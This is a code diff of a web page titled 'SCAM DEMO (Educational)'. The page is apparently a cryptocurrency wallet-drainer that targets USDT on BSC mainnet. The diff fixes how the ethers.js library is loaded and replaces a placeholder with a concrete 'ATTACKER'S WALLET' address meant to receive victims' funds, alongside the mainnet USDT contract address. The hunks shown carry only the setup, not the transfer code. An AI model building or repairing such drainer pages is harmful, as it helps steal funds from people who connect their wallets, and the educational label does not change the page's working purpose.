--- a/index.html
+++ b/index.html
@@ -1,8 +1,9 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>🚨 SCAM DEMO (Educational Only)</title>
-    <script src="https://cdn.ethers.io/lib/ethers-5.6.umd.min.js"></script>
+    <title>🚨 SCAM DEMO (Educational)</title>
+    <!-- FIXED: Loading ethers.js properly -->
+    <script src="https://cdn.jsdelivr.net/npm/ethers@5.7.2/dist/ethers.min.js"></script>
     <style>
         body { font-family: Arial; max-width: 600px; margin: 20px auto; }
         button { padding: 10px; background: #ff0000; color: white; border: none; cursor: pointer; }
@@ -23,8 +24,8 @@
         let walletAddress = "";
         let provider, signer;
 
-        // Attacker's wallet (YOU CONTROL THIS)
-        const ATTACKER_ADDRESS = "0xYourAttackerWalletAddress"; // Replace with Wallet B
+        // 👇 ATTACKER'S WALLET (REPLACE WITH YOUR WALLET B ADDRESS)
+        const ATTACKER_ADDRESS = "0xCE1EA0e930BF7244a90696056401E6702fe0f390"; // Replace with your Wallet B
 
         // USDT contract (BSC Mainnet)
         const USDT_ADDRESS = "0x55d398326f99059ff775485246999027b3197955";
